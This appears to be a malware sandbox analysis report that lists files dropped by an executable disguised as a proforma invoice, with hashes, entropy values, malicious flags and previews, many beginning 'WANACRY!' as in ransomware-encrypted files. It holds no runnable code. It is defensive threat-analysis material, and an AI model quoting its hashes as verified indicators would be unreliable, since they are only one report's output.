                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1512
                                                          Entropy (8bit):7.860510281006179
                                                          Encrypted:false
                                                          SSDEEP:24:bkFIs6IYi87QKLTXwOVVyzbCR1xKni2xyq38zYVXU2xNjYdf36E03oOfLtRbNWjS:bk/eLTgYy3il2xm8VkKjmf36lvL/gmA0
                                                          MD5:414790AA06DC87778D049709FB7DA832
                                                          SHA1:5E1DE14C824BF739477B74865DCD60BCEF12B9B9
                                                          SHA-256:C5DAC9C5CC7B09494494A9C82411DD7DBE0BC4BA5E63057C54777ECB05EC2F87
                                                          SHA-512:D826D4ED4F659BDFD982CBB2779D649479AB5A7F129EC14645426EB205A63C011B81A1219E7431D98AEC739AEB2BA0B52AA26DB7FF26A004D5806E9F2710EDC1
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1752
                                                          Entropy (8bit):7.890161575573857
                                                          Encrypted:false
                                                          SSDEEP:48:bkEbTIFjZ1aDybDlOb6/X9o7vgKnwNe1pQA1YCHkspmO+WTMK:oEMFN+Ep1o7vvwNupjWCE1K
                                                          MD5:B54C35DCECF5A3835A70F9807BFBD06C
                                                          SHA1:29C9BB6D0E06C1E0FAF76249219AE7313573513A
                                                          SHA-256:A6CF5B44A8ED339FB1992AD76EFB6A29C6360CFD0D703C6386F3752609C91E41
                                                          SHA-512:20B74E2A7E87BCA63374CE5F4C029A7A26106BED57B8690740A1A69152D1275DFDB00AB905063815732718E1094984A114F9BB726DF0788AC4499AA67AACC600
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):28952
                                                          Entropy (8bit):7.994042048695636
                                                          Encrypted:true
                                                          SSDEEP:768:lzlo2Swrska2zJAGr4sa02xUKl2Sf+yLjIX9VObqPze8Q:l5W2zJA8TAZ2SfcXvPzeT
                                                          MD5:7C52A93C2BC9237A5F192975C7F0C725
                                                          SHA1:68F8B3BA1A8A6646A134479151E6B47B150013D6
                                                          SHA-256:F494DBF426241379E491F233EB85C98042379E44A51B76F209416357CD5239BC
                                                          SHA-512:BEA750C73E71C7CCD006DC5F4BE6B299DDE6D0A818FA67B0AEE6700DD3206C46B2109DA3FD6C0B5C53C8F49326B14D266B6CCFA436D46A0963EE525A987B3E71
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):16664
                                                          Entropy (8bit):7.98769280462868
                                                          Encrypted:false
                                                          SSDEEP:384:puiTadUO4zrCFQ1uWhLShA1ryDKL3aLAL9+LUeQYsmaBhTyNe:8iwUOYelWhGaIDQqkLQQYsmISe
                                                          MD5:506DFAE5AE58648A23DB500E0B9AD342
                                                          SHA1:86C218CD98B1050C25902AC874DA8098932222C5
                                                          SHA-256:B76A7093BE9000548C5A0249AA73738CD097FFB291B41DA446D3C227BC8BBACC
                                                          SHA-512:2068FCF0C84FBF65A6F4B32649581C9D4DF389ED3CC05B1C6CE2481FC917FF6974306F7A456A5990D2C13A0E9641340A67CEAF515D558FB925E00694D74A5BD2
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):49432
                                                          Entropy (8bit):7.9963226139739705
                                                          Encrypted:true
                                                          SSDEEP:768:rpfKmDGqw9lvhwkoMEObt8/uh1gdoBhpV+mPnFCkIX+A2DKP3bZNAYaSL6TR6ec4:EmDGqW5okJUuvg07PncXJbLpeIed7
                                                          MD5:522BDBB080EFE803D07274FFA0ED1C68
                                                          SHA1:AA5A96A6F955DB0A090E9327274F05CB1EAB88EA
                                                          SHA-256:FE2DF85BC924327ADCEBB35CF49931AA724ADF778FC9C51123C9FCB9CEA454F4
                                                          SHA-512:60D495F9FA2638D0AF5D4B47283AD479360E126A42CF379106C29DFF5D837DF4A9E2BCBE3A552949655BFDC2EC6774AF4DC9C4A28CFF71FCF7EEBDDBE7911DF0
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):11496
                                                          Entropy (8bit):7.985162998497414
                                                          Encrypted:false
                                                          SSDEEP:192:UhMCPzLTM4dP99Mv8FIKsNEl00z4pJsu9drNd12bEhvLNiAHUvTL:vQ0+988mKsNEl9z4pFdrJ2bEhvLNiAHG
                                                          MD5:F9723A700F656364F1C9AC4CC09B2F53
                                                          SHA1:2093F11F9E1B7FC6CE3D1F9315DCEFE67499A8AB
                                                          SHA-256:432EC81E15ECA1B7A56BD183BAF5E2D44DEE0AE458FFC28DD3C173DB783A0FA5
                                                          SHA-512:59BF8F10A196D353F173DB23D69B017EE2252AE6EBE7915F185DAA6EA4AFBAE5EF4D88C670DDEF34CBD9A838226E43AA7973961D5E19B77A2C0851F640F92067
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):33048
                                                          Entropy (8bit):7.994197773676238
                                                          Encrypted:true
                                                          SSDEEP:768:0CMA+P2VDj6+zH9sj32rezL+P7TtROKkJ:0COGDGUGj3bL+Cv
                                                          MD5:50B47D3B60B79E8AEB0F7839040E7048
                                                          SHA1:0500BF0AEDA3D3944F606F66EFDFFDEEA69D47D9
                                                          SHA-256:17465DBD76818F51A563D970BC3ECB18CCAD989CB6E9A022397A42936973EACC
                                                          SHA-512:46D992691D5F807DD928D051218A3572DDF79E007F4F94B739787B3528F53C5EE9AA2BA71830D2B4639244EEAD44B0D16CC653F8156D912D2B4A1D677EB429DF
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):20760
                                                          Entropy (8bit):7.991080074112121
                                                          Encrypted:true
                                                          SSDEEP:384:m0mX2MCaI4oxcQuq3vONwJmbHafFmxnsPHzFQBUZExknTcfr4H2tbi0B28:RTM/QuSJmbHfxnsPT+uznTczmY7
                                                          MD5:9317807F6A2CAF383F24706EC53F6133
                                                          SHA1:3A4B255C33BD6ED998BA0315FAA87EBCE92775EF
                                                          SHA-256:7C4C5CF1E7310B1B70D2432D683B32BE6BB29813FE6E247E924DC392C469C8AC
                                                          SHA-512:24ACCF020E72B49BBB3FF672672965CC1A8F11C12E755C4E85D06C8086AE310B394759FE09DCDF7D46FDB779B9BB4339F458A6FA29F0C6BEC9A2C7FC4C25BA40
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):5272
                                                          Entropy (8bit):7.961358534276766
                                                          Encrypted:false
                                                          SSDEEP:96:otV9duki3dqJZCAPapLbt2wuKo6yOLIC5PSgbR8grhRfA8Bp0mGpOVhpaC:ii3dqyAiZbtluHpyPSkfx1GpO7D
                                                          MD5:C8AE88A3B27897C1715BCEDEEA9073FB
                                                          SHA1:C4AB1EFEA4550A1444947C050CB4C8C44745AAD3
                                                          SHA-256:02A9299051AB0439A58E5B078EE827FF83686A4A6C42DFD1397FB451FA133C26
                                                          SHA-512:4B3A4ED8A358F647014D8FA901FF72D8BFE3ED6C1E43877D072355E784D0D7BFC85579D46C81AF2F2BB61F826F99A2ACEC682B5F5429B2F70C68CDEA7F926288
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):80552
                                                          Entropy (8bit):7.99783772904527
                                                          Encrypted:true
                                                          SSDEEP:1536:6L3OM0bbzuAFhR3tlZFZsRANBtdDRyp5CI6PBLShuGgyZRIWCpMzeOZHPDO4:seFuwhR3jNsiBtdMpUah5gMIWsM1V
                                                          MD5:89A10065C72453BB9F24B6733C29B384
                                                          SHA1:B98D9B7F88C4472EB2A96EF181E9010484CF3127
                                                          SHA-256:559D9D41637D626963AA9B2A211D89D5B2ADC893F947C293DFEE109A6B280B7D
                                                          SHA-512:7E22A53F88950D92DF889A53BA360ABE43DC270377B9C7F2F966BAC9AB224A8C2B50040FB1B36ECE8FF79A706C0853FCC2564921FD0EFF4FD391334ED96FAF9C
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):584
                                                          Entropy (8bit):7.608795868716206
                                                          Encrypted:false
                                                          SSDEEP:12:bkE6NH/Q4WOPiLx1bQv+6fRCNVHuQe1uuSmyXd2x3MBb4i9:bkKb/bQ26fRCzHut1Cyc+I
                                                          MD5:6179D1BD1D2C5AE54F8873BB57B189BA
                                                          SHA1:3DCA68B33E6B0847ABE13A326E9724953FD34F68
                                                          SHA-256:D3C52BCA7A5F0F26B276C297DBCC3FE2E1E8E845B65D4C762328177A973943B9
                                                          SHA-512:CF625B36D744724DB613D58C8291BB4CC2C31499258CA3A3264DA51BE8F0FEF9EEBE33CDAD57342000A5CB9AF47A5294D21011EB6CC8284DF1FAADBB6F6AA648
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):9704
                                                          Entropy (8bit):7.980799888109615
                                                          Encrypted:false
                                                          SSDEEP:192:kRtdPGsniq9YgUqVh+uZIlfog5aukGu+VdaMfLk40Ki3D0yMZHXyH:WPGSvK16HZ6RauD6Mf4f/Yy0HXu
                                                          MD5:8673FB8A0E689499C65EBBFB53C5F86D
                                                          SHA1:3CE46822BB9CD16443B42046E1C4B0F68BFC4E7B
                                                          SHA-256:A8B4C7E40356E8B1527F97B728E8F93DA582109F6818E9237F68C2C5260D97EB
                                                          SHA-512:7AC2EB8B73EC1F117CE0FF2A5D52E371F07FBB436F90470380F459E6C222B76844C819E3874B9C831B9C3BADA85D57EF45E71C537C4CC905DE4891887AF0FBD0
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):10056
                                                          Entropy (8bit):7.98340088381614
                                                          Encrypted:false
                                                          SSDEEP:192:WVkUfXYnwRogUKJWe/GndJ+4RLGjT68QyVwhlfLjzOT:WVkUQnKDWe/WO4aWwVwhlj2T
                                                          MD5:2D4EB16D4E08EA9C658B31338FE0D4AC
                                                          SHA1:45D78986F07211577660568AD66C396E662A4D26
                                                          SHA-256:50AF34615D90B497D0AFE06A57C1DA49B60FBCBCD8C7129D166037EDC77B34D8
                                                          SHA-512:51995D3AC44FF7FC5C95E421E8C15D8FB8C37780BE42110B7384A5B77FDA7A4DA8EA4C4A888C9A1F204A85EE39986BAD7CA4555208545088B51000EDBF5FADE0
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):16664
                                                          Entropy (8bit):7.990350577990723
                                                          Encrypted:true
                                                          SSDEEP:384:hBGPdIBVLYiVAqwaPAhv9gZbRXHDdxNeiLq:HGPdvQLUv9gZbdjH3u
                                                          MD5:CF0ABE86C13D676235395041F7033A3C
                                                          SHA1:EBDBE3A0D67E3410029D4C161B5C12F7C530926A
                                                          SHA-256:38085F57A90343FB7AA15999697F1A36DCAF70D5342A29FD5851DFDBFD8A5CBB
                                                          SHA-512:7FBD886817F604107E03A92AD6610CB4F16C01C0EA5CBDD1C0D130AAAA75CC85848E07AF508F7F85314BC0904818D6BF2D83E65D6ECBF1A6BA19E500433A548A
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4376
                                                          Entropy (8bit):7.949783899265672
                                                          Encrypted:false
                                                          SSDEEP:96:ohgdwPte+qCCNTrGQlsvld2WCqtl9O52flXtF:egdRqwGQsld2WzlvXtF
                                                          MD5:EDA10111FC50AD4D48E49DDF76F3BA1E
                                                          SHA1:A8BF4C5CCA07BE5759BA456B102BF216C49007E8
                                                          SHA-256:E4019510F816D1FE105993B8AF6C1CA4AB2E6F77E899E3077F51EAD6967C6DA4
                                                          SHA-512:87708140DF158324CBFB67A13A83912AF9A8CA568DB34C9548D4EF71FC0BC71967FC56EFB5D44A506FA45ACF2595A1F19D76300D4F0360684D0D448B5F149E59
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):80488
                                                          Entropy (8bit):7.997540531943018
                                                          Encrypted:true
                                                          SSDEEP:1536:ilYqBnB2ykuAKh5kBsAnP0s88RFXnmttjxIqRWnUduKiif1ngnAv:ilhBnAd+5klV88PXnE9xwnUFiif1gnAv
                                                          MD5:EAC20B794366F5E1E032A74E72696E11
                                                          SHA1:F99AA84FA541D67DC1868D6B5366C287B5E1DA84
                                                          SHA-256:7B3971B035F9A84FCD887C892BAC258E5001595661064CC10717A73795137FEC
                                                          SHA-512:E4901BDDCC22F5CF30F2F4FBE6F3BE46CD0B779B52CCCB5F7EB4D562B1FF46F5471B061C05D261105D1C6C5C1D59F96228977BB4277AA5B5BE7E59CBCD76B729
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):11848
                                                          Entropy (8bit):7.982924952610475
                                                          Encrypted:false
                                                          SSDEEP:192:c8pDQctxjA5QvKnO7v3Gz9gtNiNdiQf0syqmO3+ujnMuMBYIvKTs2hLS3t:VQixjA5kKO7fGhgzybssy/m+ujMdK2K+
                                                          MD5:34D6B1AE02CE4E3C16746BE8A776A9FC
                                                          SHA1:DFE11C11181AD9DB74EBF6A23CC9521154430538
                                                          SHA-256:18CEF95332FE400472F5E11ED59675A258940AAA68CF06313FFED9F3268859C7
                                                          SHA-512:FFBCBB337C4CE912F4C683ED711A08824FFD023AC7BE51166A33988BB095CCF15D67373D9BFFBBA189386E6A02498B1CF80FABBE45708D2A18BF4F8A72ACB252
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1179240
                                                          Entropy (8bit):7.999839065326081
                                                          Encrypted:true
                                                          SSDEEP:24576:rGb6zKPT5xPjDszDG+bkmt3mjY0q3xb624ia5J:abF9Xfk3mvq3CJ
                                                          MD5:1E39365B2B605B2043B5E0ABB720538B
                                                          SHA1:C3E31F0CB68478A78AFF144A44C1CB33CFD2E23B
                                                          SHA-256:439969BC05A6C33C915B62298389050B08F04AEC441E1DEB6933592A4ACADD49
                                                          SHA-512:4A8F59CC2BC37D25A10AFA456E15D999725E691B9BC144AAA1C76CFCBC691479A7F439763752017D7193FD8A739FEC8FCDDD54AC9C69DAC4564ACA71624100E5
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1010680
                                                          Entropy (8bit):7.999819898825211
                                                          Encrypted:true
                                                          SSDEEP:12288:bTUk+Pusy1jqRo6YPnB4d0LZ7pcdUma3ayil8j6dXm0JWFlFgoG9keHSTtLVN:XN8a664d0LZ7SJa3ol8OnWFTg79ZSTt
                                                          MD5:C45CB44580550F76EAB603B68EAB8338
                                                          SHA1:EB143E03B1B3F462925BEC34E6ED6F2590F4097D
                                                          SHA-256:0AD3F7C626CEABC2FC9F31D8DABBB7FE9C72CC79F0736E2CE563733E6BFFED22
                                                          SHA-512:EA2C43512B9DA5A0413FF5B75998FF59A0C4C24B363542D000F6D1E1E6E2803935A2B7C647F46F2E933A713A4DAF1F4C754821DAC2B6A4D6598F3C99A8A110B0
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1042184
                                                          Entropy (8bit):7.999804880191285
                                                          Encrypted:true
                                                          SSDEEP:24576:Y+7V5ZwwZAN2zSyyBYkLXqhgePw/MJXTSg:Y+RTw4w2zSyyBn6o4TSg
                                                          MD5:81140A11992DC6D0167CECD7C81F01B5
                                                          SHA1:7581D03AA5D084790F1A9392483FF363983913D5
                                                          SHA-256:0C0EBC8659A0BEC6534CD826AB6B5738AD4D60664F0DCC6F7DC78B8F511E77E6
                                                          SHA-512:D128A3B841D5A3CAEA50563B0C11886D3338F436D6C706E0E0C2A8230093B622A585252507438827937E82E17B296AD77B133E68B74CCCB970A98BCA3D137E7A
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1681000
                                                          Entropy (8bit):7.9998856937145915
                                                          Encrypted:true
                                                          SSDEEP:49152:X9DW9bi8KQhYjmExjYXVYmfgGotgWM4AODBpd:X18KOemEdIV9gGpWM5OFX
                                                          MD5:70CA6C933AA6C2829080874211126BD9
                                                          SHA1:47CAE691130DEE1D9616EB59C9F3A3FC30EDF715
                                                          SHA-256:C2728396B2604B5686FA5C42A9A1178D11A31454F12096B9EDFA30F3A73E1CBF
                                                          SHA-512:6CF19DE6C98A22DF49686CF5AF8321FA1C0D71DDBA2B5703D48A457DAA4A4CC9D641DD3CCD1B50FD03DBF66770DBCF9525F686F74AE9E72D1A93D1BF41710C2F
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):80072
                                                          Entropy (8bit):7.997578833851237
                                                          Encrypted:true
                                                          SSDEEP:1536:CoV74f8veOI/Go21dTzBXVrM11MI3edMAI70DTkJNfCWjXK3DdYh84LIrd:KGo+XVw11F3edMKgVu3DdYh8kKd
                                                          MD5:795F96BF5A069F3CD1A1CB7707F3678C
                                                          SHA1:9B150A586F2A6BFCA9F6765974753E2E5D5D6B47
                                                          SHA-256:AFBD1B176ECB8DE7C7E4A1863E644E32AC4410230E15A0AC4C61DE3924E82403
                                                          SHA-512:ACB00A07587D3C2CCB40EDC841C2870D445577713A95AD872B5B292A325A839663F143B292590F88848B49E53DB1B9F43F0C760C886B7C447AE5F0333B6821AD
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):80072
                                                          Entropy (8bit):7.997578833851237
                                                          Encrypted:true
                                                          SSDEEP:1536:CoV74f8veOI/Go21dTzBXVrM11MI3edMAI70DTkJNfCWjXK3DdYh84LIrd:KGo+XVw11F3edMKgVu3DdYh8kKd
                                                          MD5:795F96BF5A069F3CD1A1CB7707F3678C
                                                          SHA1:9B150A586F2A6BFCA9F6765974753E2E5D5D6B47
                                                          SHA-256:AFBD1B176ECB8DE7C7E4A1863E644E32AC4410230E15A0AC4C61DE3924E82403
                                                          SHA-512:ACB00A07587D3C2CCB40EDC841C2870D445577713A95AD872B5B292A325A839663F143B292590F88848B49E53DB1B9F43F0C760C886B7C447AE5F0333B6821AD
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):988600
                                                          Entropy (8bit):7.999804326805857
                                                          Encrypted:true
                                                          SSDEEP:24576:nDo3l7qnkR1JZLncRRHGEKXiIIEEzQ40UPisTQS3aGCBnBBWT98:nU3l7yacRRDKSIqTPi+QS3voSG
                                                          MD5:EE3E04B433CD1452443AEEC906AE1F95
                                                          SHA1:F027A686B03448081E2BF56929D108BE5590CD88
                                                          SHA-256:F1C2D4B15E3C30483EBED426EF30BC6E61FA31BBEB1C83A2CD926B9E7527632E
                                                          SHA-512:A0D57E33B52C4281FE048FA2537A8A7A6C2C1434B8FD9CB23A9689C3F5D95DA70A3808031B8F6B1558EA71B9475129D0BA5C0BF210E2EA95710893C5391AE275
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):5653560
                                                          Entropy (8bit):7.999961732636273
                                                          Encrypted:true
                                                          SSDEEP:98304:tYr91bw9M2F+nXB2uAuJajgkDz/BWW7g6Uq+EynRbLIOYAWvhqVl61OrmwzQxG:kk9/+nR2uAecDz/5Y3TRbEOlW8l0EDz1
                                                          MD5:F65033494A2F23CB39D358834396EF75
                                                          SHA1:F9B5ED080571B48D2E53679F58453372CE6134AA
                                                          SHA-256:05245F40F3262EE74FBE71293519D2ACFD3CD0F9EC3994B6B33441623ED1DE6A
                                                          SHA-512:61ED8DB415678CA992D600B03FFD5A1BCA8E473B21D9E36942AFF16867A7CA9CC53CA8E44881F59CD31B8AA0F3549677964D121441274D4FB2B267D2449F8DD6
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):12216
                                                          Entropy (8bit):7.983884513815287
                                                          Encrypted:false
                                                          SSDEEP:192:N5zOMNZsPhbNP2/omwIVAen2vZBYTrejNYgTzNmrP1qAkD73Wj8OrixipmrYt4K8:nHNZsPhVeozaqB7ZYgTzNW2HbQt42kMg
                                                          MD5:43369E678CD6E6B121A10EEDA36539A8
                                                          SHA1:B166766F8DFFBC1BDF28330D2FD5CD582CFF2075
                                                          SHA-256:8458857A7B2ED521CF17F572AE4912040C9AD579C66405549BD01A855F361F6A
                                                          SHA-512:440412408332D2AD27E2AD9BDA2CD0AA121BE2EFCA6ED5D2CB61845570A8A4395371E5E109E2F0D51C288AE20947F8917A334D43A79F9FA419350319C903B892
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):358056
                                                          Entropy (8bit):7.999498092945844
                                                          Encrypted:true
                                                          SSDEEP:6144:vNMxNf2ideX0PDitXi4AB9P3kH+KdfbZrAxWQgqI3EFmtAu4N9qc5f/k0:lwf2mkiG9Ic+O3QFgEFmt2IC3k0
                                                          MD5:1F323DA03506042880E1F4F647CC8873
                                                          SHA1:66451231E9C2E813A2EAD8BDAE89DB5D1BB79FA2
                                                          SHA-256:1D1E4D8D06487A8561620EB8E2715CBBC3D043D493187A0C86FA3E38DC043AF5
                                                          SHA-512:0AAA5D0EEF4130201878E64302AD680F40D338ECD5DC5BFD1A5D9266D57C341EDC52ACAF3302E677B8F5C83030DEC4193A8F5920825BB35457A5877619259E00
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4552
                                                          Entropy (8bit):7.960881940796458
                                                          Encrypted:false
                                                          SSDEEP:96:oeZbYWmVeWV5Si9wUxXSDKpRbSR8fY0tV2ij/PnXSinl/kaax:tZvWLHxXpjS2j+ijnCIXY
                                                          MD5:46390D6749D2C64A03C0957D713FDC57
                                                          SHA1:393AC83A6122649FA2ECB50BD76B37E4332ABA10
                                                          SHA-256:386CD1EF82C59DEBF3113B93D57E0E1C59397B49C5419A34B0AA7C02CCC0D79A
                                                          SHA-512:70373428DD58F3FF723EF1355849FE20DC040E26FF9E7F6BDA4F3EFB76E4B402FC2B7400DFDA3799EEA11CAFBB501C8A0736C4D95E7C81C82C6DCB45F4BD4445
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1144
                                                          Entropy (8bit):7.834418573675154
                                                          Encrypted:false
                                                          SSDEEP:24:bkxVhyBrozsRK2Bim7OEKyyCct7TMwPvoXgaYEomInql94nq:bkkRrK2Bim74yOPMgwXga3fInqEq
                                                          MD5:EB16A3C4405C9941F347619F458810DD
                                                          SHA1:B96E0BE27EEFE6951BA8E53841EAA20259C9DB97
                                                          SHA-256:2A62122B1505A4C82623496A573CDEA80C4ED985A2D919527AF42A29CEDB9A0F
                                                          SHA-512:5C3588D60E040A90CFD3B9B0E9689EB6416F53162901A4F5E33F0D8FB3418BAAF839BB36E7DB4CB0881EBBA6AA6CA5632C28D273EED25B4C2F5F48E822A43458
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):5608
                                                          Entropy (8bit):7.964312544618281
                                                          Encrypted:false
                                                          SSDEEP:96:oo6QSXroxji7AOtY2WnkvvsCAmPX2ubCWSvr5aXq0Nezkr3Gs7cHMwuxD8l:ikxmsOtYlk3ASGDWyr5g5NcHMwux4
                                                          MD5:EF285240B08DABC758ACA38B39EE2270
                                                          SHA1:E3531B8A24B58D0B4C7201E07DA0025A5A9928A4
                                                          SHA-256:A0D28D3129DED1911E07B88ECE18D48A29A230249F00AAD5805FDDF7D41E77ED
                                                          SHA-512:300D70B50236D3DDCFB0C807212159E194007F614AF4A0C407C882C97BB078356F390C581B646DE4BE4B8754BF2917BC8037D9C803A65E33C8E85E64583CAC2A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....'1.......^t.A#q..z....z..&x@.....y....t.j.*Q...f.[I.7.ibV...8..T........I..H..ym.d..'.^.ax./s....M...|.I...1.^.#Z..K(m{..Y.y.B.Q....s.F(..@."%F..X......S%.|.C.-.e..D`.....Bm.0..@.1O..SQ........2".B....sW+-m..U........HK...0.....m..z..~....lI....4..............3.C..%.7...?...[..W..{l..x..)...K;/X.TB?...Ko..oG..........4...x........w.Q..d..1G...K.\x3.....V.}...H.^..)..3..X..?5..c,..pC`.,....E3K%....|.b...n7........s..m.r....u..hX.......X..KKRK..f..t]...d.[P...%A..L(..z"..W...........s..Q.@..Mn......$.(0..+.~J.*.4............D..r=;..`.....5m.... ?V...MM.U&..].....T5u.+..'}F...Z..N7.....O.jm.W...n.....|U.z.N7..S.)..-....Z..Kj2.w.,T.....=#.....KW......1.F..@m......|-....f.5.5........uPIL...;.....S...)....s..9p.#e.i......$.$.}.C.X(.....}....}..P.P.c.....O..x\..f..L.N...-\..?......8l.8.0...........V......*_%.....h...}..h.H|..bA.-@e..B..K...{..2D...I.M.....1+].M.......x..V.*<....L..:.g. ..2._.|n# ....[.i... Ah...]jRYh..4.jb
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2696
                                                          Entropy (8bit):7.934982023386476
                                                          Encrypted:false
                                                          SSDEEP:48:bkOhnX7o0FsxWLb2bNJcrvycM71+Unk6eb+VUE9ui7nwLj8QO+ym:oOp7o0FsxuSbNJcrvyN5+mk6u+VjnwnJ
                                                          MD5:D9EB6D11E75AD0818C354437DF474441
                                                          SHA1:9C29ACE87C06FB8A3D0DF74AF37F6024EF40A49A
                                                          SHA-256:ADBFE12BA425F56DA19F03DDED61E25C2DDABAD15F498EA7A8593A16421E0E88
                                                          SHA-512:9390456B2143A22436203E047F13CD319A4471BE502A0D77A0DD813224F4F0E23399A9CF167C9B59F6F83DDEDA6E2DD910C206793D35D22620A142614743B5FC
                                                          Malicious:false
                                                          Reputation:unknown
